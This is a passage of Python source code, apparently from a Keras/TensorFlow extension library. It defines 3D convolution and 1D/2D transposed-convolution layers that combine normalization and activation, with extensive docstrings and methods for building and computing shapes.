`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: Initializer for the `kernel` weights matrix.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
kernel_constraint: Constraint function applied to the kernel matrix.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)` if
data_format='channels_last'.
Output shape:
5D tensor with shape:
`(samples, filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, filters)` if
data_format='channels_last'.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have
changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1, 1),
lgroups=None,
padding='valid',
data_format='channels_last',
dilation_rate=(1, 1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv3D, self).__init__(
rank=3,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
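The "values might have changed due to padding" remark in the shape sections above follows the standard Keras output-length rule. A standalone sketch of that rule (mirroring `conv_utils.conv_output_length`, written here for illustration only):

```python
def conv_output_length(input_length, kernel_size, padding, stride, dilation=1):
    """Compute one output spatial dimension of a convolution."""
    # Effective kernel extent once dilation is taken into account.
    dilated = kernel_size + (kernel_size - 1) * (dilation - 1)
    if padding == 'same':
        length = input_length
    elif padding == 'valid':
        length = input_length - dilated + 1
    else:
        raise ValueError('padding should be "same" or "valid".')
    # Ceiling division by the stride.
    return (length + stride - 1) // stride

print(conv_output_length(128, 3, 'valid', 1))  # 126
print(conv_output_length(128, 3, 'same', 2))   # 64
```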
class _AConvTranspose(Layer):
"""Modern transposed convolution layer (sometimes called Deconvolution).
Abstract nD transposed convolution layer (private, used as implementation base).
`_AConvTranspose` implements the operation:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
rank: An integer, the rank of the convolution, e.g. "2" for 2D convolution.
filters: Integer, the dimensionality of the output space (i.e. the number
of filters in the convolution).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
modenew: The realization mode of this layer, which could be
(1) True: use an upsampling-padding-conv work-flow to replace the
transposed convolution.
(2) False: use a plain transposed convolution.
We recommend using mode (1); however, it can be deactivated by
toggling the global switch in this module.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of the group convolution. Group convolution
is used only when this option is set. The latent filter number of the
group convolution is inferred as lfilters = filters // lgroups. Hence,
filters should be a multiple of lgroups.
padding: One of `"valid"`, `"same"`.
output_mshape: (Only available for the new-style API) An integer or
tuple/list specifying the desired output shape. When this option is
set, `output_padding` and `output_cropping` are inferred from the
input shape, so any values passed for those two options are ignored.
A recommended way to use this option is:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of n integers,
specifying the amount of padding along the axes of the output tensor.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be padded.
(When using new-style API, the padding could be like ((a,b),(c,d),...)
so that you could be able to perform padding along different edges.)
output_cropping: (Only available for the new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
(Because this option only takes effect on new-style API, the cropping
could be like ((a,b),(c,d),...) so that you could be able to perform
cropping along different edges.)
data_format: A string, one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, ..., channels)` while `channels_first` corresponds to
inputs with shape `(batch, channels, ...)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, rank,
filters,
kernel_size,
modenew=None,
lgroups=None,
strides=1,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
trainable=True,
name=None,
_high_activation=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(_AConvTranspose, self).__init__(trainable=trainable, name=name, activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
# Inherit from keras.layers._Conv
self.rank = rank
if modenew is not None:
self.modenew = modenew
else:
self.modenew = _get_macro_conv()
self.filters = filters
self.lgroups = lgroups
if (lgroups is not None) and (lgroups > 1):
if not self.modenew:
raise ValueError('Transposed group convolution does not support the old API; please set modenew=True or configure the macro of this module.')
if filters % lgroups != 0:
raise ValueError('To group the output channels, the output channel number should be a multiple of the group number (N*{0}), but {1} is given.'.format(self.lgroups, self.filters))
self.kernel_size = conv_utils.normalize_tuple(
kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if (self.padding == 'causal' and not isinstance(self, AConv1DTranspose)):
raise ValueError('Causal padding is only supported for `AConv1DTranspose`.')
if output_padding is not None:
if self.modenew:
self.output_padding = output_padding
else:
self.output_padding = conv_utils.normalize_tuple(output_padding, rank, 'output_padding')
else:
self.output_padding = None
self.output_mshape = None
self.output_cropping = None
if self.modenew:
if output_mshape:
if hasattr(output_mshape, 'as_list'):
self.output_mshape = output_mshape.as_list()
else:
self.output_mshape = output_mshape
if output_cropping:
self.output_cropping = output_cropping
self.data_format = conv_utils.normalize_data_format(data_format)
if rank == 1 and self.data_format == 'channels_first':
raise ValueError('Does not support channels_first data format for 1D case due to the limitation of upsampling method.')
self.dilation_rate = conv_utils.normalize_tuple(
dilation_rate, rank, 'dilation_rate')
if (not _check_dl_func(self.dilation_rate)) and (not _check_dl_func(self.strides)):
raise ValueError('Does not support dilation_rate when strides > 1.')
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
# Inherit from mdnt.layers.normalize
self.normalization = normalization
if isinstance(normalization, str) and normalization in ('batch', 'inst', 'group'):
self.use_bias = False
self.gamma_initializer = initializers.get(gamma_initializer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.gamma_constraint = constraints.get(gamma_constraint)
elif normalization:
self.use_bias = True
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
else:
self.use_bias = False
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
self.beta_initializer = initializers.get(beta_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.groups = groups
# Inherit from keras.engine.Layer
if _high_activation is not None:
activation = _high_activation
self.high_activation = _high_activation
self.use_plain_activation = False
if isinstance(activation, str) and (activation.casefold() in ('prelu','lrelu')):
self.activation = activations.get(None)
self.high_activation = activation.casefold()
self.activity_config = activity_config
if activity_config is None:
self.activity_config = dict()
elif activation is not None:
self.use_plain_activation = True
self.activation = activations.get(activation)
self.activity_config = None
else:
self.activation = activations.get(None)
self.activity_config = None
self.trainable = trainable
self.input_spec = InputSpec(ndim=self.rank + 2)
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(self.rank + 2)
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if self.use_bias:
bias_initializer = self.beta_initializer
bias_regularizer = self.beta_regularizer
bias_constraint = self.beta_constraint
else:
bias_initializer = None
bias_regularizer = None
bias_constraint = None
if self.modenew:
# If setting output_mshape, need to infer output_padding & output_cropping
if self.output_mshape is not None:
if not isinstance(self.output_mshape, (list, tuple)):
l_output_mshape = self.output_mshape.as_list()
else:
l_output_mshape = self.output_mshape
l_output_mshape = l_output_mshape[1:-1]
l_input_shape = input_shape.as_list()[1:-1]
self.output_padding = []
self.output_cropping = []
for i in range(self.rank):
get_shape_diff = l_output_mshape[i] - l_input_shape[i]*self.strides[i]
if get_shape_diff > 0:
b_inf = get_shape_diff // 2
b_sup = b_inf + get_shape_diff % 2
self.output_padding.append((b_inf, b_sup))
self.output_cropping.append((0, 0))
elif get_shape_diff < 0:
get_shape_diff = -get_shape_diff
b_inf = get_shape_diff // 2
b_sup = b_inf + get_shape_diff % 2
self.output_cropping.append((b_inf, b_sup))
self.output_padding.append((0, 0))
else:
self.output_cropping.append((0, 0))
self.output_padding.append((0, 0))
deFlag_padding = 0
deFlag_cropping = 0
for i in range(self.rank):
smp = self.output_padding[i]
if smp[0] == 0 and smp[1] == 0:
deFlag_padding += 1
smp = self.output_cropping[i]
if smp[0] == 0 and smp[1] == 0:
deFlag_cropping += 1
if deFlag_padding >= self.rank:
self.output_padding = None
else:
self.output_padding = tuple(self.output_padding)
if deFlag_cropping >= self.rank:
self.output_cropping = None
else:
self.output_cropping = tuple(self.output_cropping)
if self.rank == 1:
self.layer_uppool = UpSampling1D(size=self.strides[0])
self.layer_uppool.build(input_shape)
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.output_padding is not None:
self.layer_padding = ZeroPadding1D(padding=self.output_padding[0]) # Necessary for 1D case, because we need to pick (a,b) from ((a,b))
self.layer_padding.build(next_shape)
next_shape = self.layer_padding.compute_output_shape(next_shape)
else:
self.layer_padding = None
elif self.rank == 2:
self.layer_uppool = UpSampling2D(size=self.strides, data_format=self.data_format)
self.layer_uppool.build(input_shape)
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.output_padding is not None:
self.layer_padding = ZeroPadding2D(padding=self.output_padding, data_format=self.data_format)
self.layer_padding.build(next_shape)
next_shape = self.layer_padding.compute_output_shape(next_shape)
else:
self.layer_padding = None
elif self.rank == 3:
self.layer_uppool = UpSampling3D(size=self.strides, data_format=self.data_format)
self.layer_uppool.build(input_shape)
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.output_padding is not None:
self.layer_padding = ZeroPadding3D(padding=self.output_padding, data_format=self.data_format)
self.layer_padding.build(next_shape)
next_shape = self.layer_padding.compute_output_shape(next_shape)
else:
self.layer_padding = None
else:
raise ValueError('Rank of the deconvolution should be 1, 2 or 3.')
if (self.lgroups is not None) and (self.lgroups > 1):
self.layer_conv = _GroupConv(rank=self.rank,
lgroups=self.lgroups,
lfilters=self.filters // self.lgroups,
kernel_size=self.kernel_size,
strides=1,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
else:
self.layer_conv = Conv(rank=self.rank,
filters=self.filters,
kernel_size=self.kernel_size,
strides=1,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
self.layer_conv.build(next_shape)
compat.collect_properties(self, self.layer_conv) # for compatibility
next_shape = self.layer_conv.compute_output_shape(next_shape)
if self.output_cropping is not None:
if self.rank == 1:
self.layer_cropping = Cropping1D(cropping=self.output_cropping[0]) # Necessary for 1D case, because we need to pick (a,b) from ((a,b))
elif self.rank == 2:
self.layer_cropping = Cropping2D(cropping=self.output_cropping)
elif self.rank == 3:
self.layer_cropping = Cropping3D(cropping=self.output_cropping)
else:
raise ValueError('Rank of the deconvolution should be 1, 2 or 3.')
self.layer_cropping.build(next_shape)
next_shape = self.layer_cropping.compute_output_shape(next_shape)
else:
self.layer_cropping = None
else:
if self.rank == 1:
input_shape = input_shape[:1].concatenate([1,]).concatenate(input_shape[1:])
if self.output_padding is None:
output_padding = None
else:
output_padding = (0, *self.output_padding) # No padding along the dummy height axis (output padding must be lower than the stride, which is 1 there)
self.layer_deconv = Conv2DTranspose(filters = self.filters,
kernel_size = (1, *self.kernel_size),
strides = (1, *self.strides),
padding = self.padding,
output_padding = output_padding,
data_format = self.data_format,
dilation_rate = (1, *self.dilation_rate),
activation = None,
use_bias = self.use_bias,
bias_initializer = bias_initializer,
bias_regularizer = bias_regularizer,
bias_constraint = bias_constraint,
kernel_initializer = self.kernel_initializer,
kernel_regularizer = self.kernel_regularizer,
kernel_constraint = self.kernel_constraint,
trainable=self.trainable)
elif self.rank == 2:
self.layer_deconv = Conv2DTranspose(filters = self.filters,
kernel_size = self.kernel_size,
strides = self.strides,
padding = self.padding,
output_padding = self.output_padding,
data_format = self.data_format,
dilation_rate = self.dilation_rate,
activation = None,
use_bias = self.use_bias,
bias_initializer = bias_initializer,
bias_regularizer = bias_regularizer,
bias_constraint = bias_constraint,
kernel_initializer = self.kernel_initializer,
kernel_regularizer = self.kernel_regularizer,
kernel_constraint = self.kernel_constraint,
trainable=self.trainable)
elif self.rank == 3:
self.layer_deconv = Conv3DTranspose(filters = self.filters,
kernel_size = self.kernel_size,
strides = self.strides,
padding = self.padding,
output_padding = self.output_padding,
data_format = self.data_format,
activation = None,
use_bias = self.use_bias,
bias_initializer = bias_initializer,
bias_regularizer = bias_regularizer,
bias_constraint = bias_constraint,
kernel_initializer = self.kernel_initializer,
kernel_regularizer = self.kernel_regularizer,
kernel_constraint = self.kernel_constraint,
trainable=self.trainable)
else:
raise ValueError('Rank of the deconvolution should be 1, 2 or 3.')
self.layer_deconv.build(input_shape)
compat.collect_properties(self, self.layer_deconv) # for compatibility
next_shape = self.layer_deconv.compute_output_shape(input_shape)
if self.rank == 1:
next_shape = next_shape[:1].concatenate(next_shape[2:])
if self.normalization and (not self.use_bias):
if self.normalization.casefold() == 'batch':
self.layer_norm = BatchNormalization(axis=channel_axis,
gamma_initializer = self.gamma_initializer,
gamma_regularizer = self.gamma_regularizer,
gamma_constraint = self.gamma_constraint,
beta_initializer = self.beta_initializer,
beta_regularizer = self.beta_regularizer,
beta_constraint = self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'inst':
self.layer_norm = InstanceNormalization(axis=channel_axis,
gamma_initializer = self.gamma_initializer,
gamma_regularizer = self.gamma_regularizer,
gamma_constraint = self.gamma_constraint,
beta_initializer = self.beta_initializer,
beta_regularizer = self.beta_regularizer,
beta_constraint = self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'group':
self.layer_norm = GroupNormalization(axis=channel_axis, groups=self.groups,
gamma_initializer = self.gamma_initializer,
gamma_regularizer = self.gamma_regularizer,
gamma_constraint = self.gamma_constraint,
beta_initializer = self.beta_initializer,
beta_regularizer = self.beta_regularizer,
beta_constraint = self.beta_constraint,
trainable=self.trainable)
self.layer_norm.build(next_shape)
compat.collect_properties(self, self.layer_norm) # for compatibility
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation == 'prelu':
shared_axes = tuple(range(1,self.rank+1))
self.layer_actv = PReLU(shared_axes=shared_axes)
self.layer_actv.build(next_shape)
compat.collect_properties(self, self.layer_actv) # for compatibility
elif self.high_activation == 'lrelu':
alpha = self.activity_config.get('alpha', 0.3)
self.layer_actv = LeakyReLU(alpha=alpha)
self.layer_actv.build(next_shape)
super(_AConvTranspose, self).build(input_shape)
def call(self, inputs):
if self.modenew: # Apply new architecture
outputs = self.layer_uppool(inputs)
if self.layer_padding is not None:
outputs = self.layer_padding(outputs)
outputs = self.layer_conv(outputs)
if self.layer_cropping is not None:
outputs = self.layer_cropping(outputs)
else: # Use classic method
if self.rank == 1:
inputs = array_ops.expand_dims(inputs, axis=1)
outputs = self.layer_deconv(inputs)
if self.rank == 1:
outputs = array_ops.squeeze(outputs, axis=1)
if self.normalization and (not self.use_bias):
outputs = self.layer_norm(outputs)
if self.high_activation in ('prelu', 'lrelu'):
outputs = self.layer_actv(outputs)
if self.use_plain_activation:
return self.activation(outputs) # pylint: disable=not-callable
return outputs
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(self.rank + 2)
if self.modenew: # Apply new architecture
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.layer_padding is not None:
next_shape = self.layer_padding.compute_output_shape(next_shape)
next_shape = self.layer_conv.compute_output_shape(next_shape)
if self.layer_cropping is not None:
next_shape = self.layer_cropping.compute_output_shape(next_shape)
else: # Use classic method
if self.rank == 1:
    next_shape = input_shape[:1].concatenate([1,]).concatenate(input_shape[1:])
else:
    next_shape = input_shape
next_shape = self.layer_deconv.compute_output_shape(next_shape)
if self.rank == 1:
next_shape = next_shape[:1].concatenate(next_shape[2:])
if self.normalization and (not self.use_bias):
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation in ('prelu', 'lrelu'):
next_shape = self.layer_actv.compute_output_shape(next_shape)
return next_shape
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'lgroups': self.lgroups,
'padding': self.padding,
'output_mshape': self.output_mshape,
'output_padding': self.output_padding,
'output_cropping': self.output_cropping,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'normalization': self.normalization,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint),
'groups': self.groups,
'activation': activations.serialize(self.activation),
'activity_config': self.activity_config,
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'_high_activation': self.high_activation
}
base_config = super(_AConvTranspose, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
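The `output_mshape` inference performed in `_AConvTranspose.build` can be summarized per axis: the gap between the desired size and `input_size * stride` is split into near-symmetric padding (when positive) or cropping (when negative). A standalone sketch of that rule, for illustration only (`infer_pad_crop` is not an API of this module):

```python
def infer_pad_crop(target_len, input_len, stride):
    """Return ((pad_lo, pad_hi), (crop_lo, crop_hi)) for one axis."""
    diff = target_len - input_len * stride
    b_inf = abs(diff) // 2
    b_sup = b_inf + abs(diff) % 2  # the odd extra cell goes to the upper edge
    if diff > 0:
        return (b_inf, b_sup), (0, 0)  # pad up to the target size
    elif diff < 0:
        return (0, 0), (b_inf, b_sup)  # crop down to the target size
    return (0, 0), (0, 0)

print(infer_pad_crop(17, 8, 2))  # ((0, 1), (0, 0)): pad one cell
print(infer_pad_crop(15, 8, 2))  # ((0, 0), (0, 1)): crop one cell
```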
class AConv1DTranspose(_AConvTranspose):
"""Modern transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 3)` for length-128 sequences with 3 channels,
in `data_format="channels_last"`.
The abstract architecture of AConv1DTranspose is:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space (i.e. the number
of filters in the convolution).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of the group convolution. Group convolution
is used only when this option is set. The latent filter number of the
group convolution is inferred as lfilters = filters // lgroups. Hence,
filters should be a multiple of lgroups.
padding: One of `"valid"`, `"same"`.
output_mshape: (Only available for the new-style API) An integer or
tuple/list specifying the desired output shape. When this option is
set, `output_padding` and `output_cropping` are inferred from the
input shape, so any values passed for those two options are ignored.
A recommended way to use this option is:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of n integers,
specifying the amount of padding along the height and width
of the output tensor.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be padded.
output_cropping: (Only available for the new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
data_format: A string, only `channels_last` is supported here:
`channels_last` corresponds to inputs with shape
`(batch, steps, channels)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
            (i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
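    As a sketch of the length arithmetic behind `new_steps`, the helper below
    reproduces the standard transposed-convolution output-length formula (an
    assumption: it mirrors the usual Keras-style computation; it is
    illustrative only and not part of this module):

```python
def deconv_output_length(input_len, kernel_size, stride,
                         padding='valid', output_padding=0):
    # Standard transposed-convolution length arithmetic (assumption:
    # mirrors Keras-style deconv output-length computation).
    if padding == 'valid':
        length = input_len * stride + max(kernel_size - stride, 0)
    else:  # 'same'
        length = input_len * stride
    return length + output_padding
```

    For example, 5 input steps with `kernel_size=3`, `strides=2` and `valid`
    padding yield 11 output steps.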
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, filters,
kernel_size,
strides=1,
lgroups=None,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv1DTranspose, self).__init__(
rank=1,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
output_mshape=output_mshape,
output_padding=output_padding,
output_cropping=output_cropping,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class AConv2DTranspose(_AConvTranspose):
"""Modern transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
    The abstract architecture of AConv2DTranspose is:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
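    The composition order above can be sketched with toy stand-ins for each
    stage (the helpers below are purely illustrative placeholders, not the
    real tensor ops):

```python
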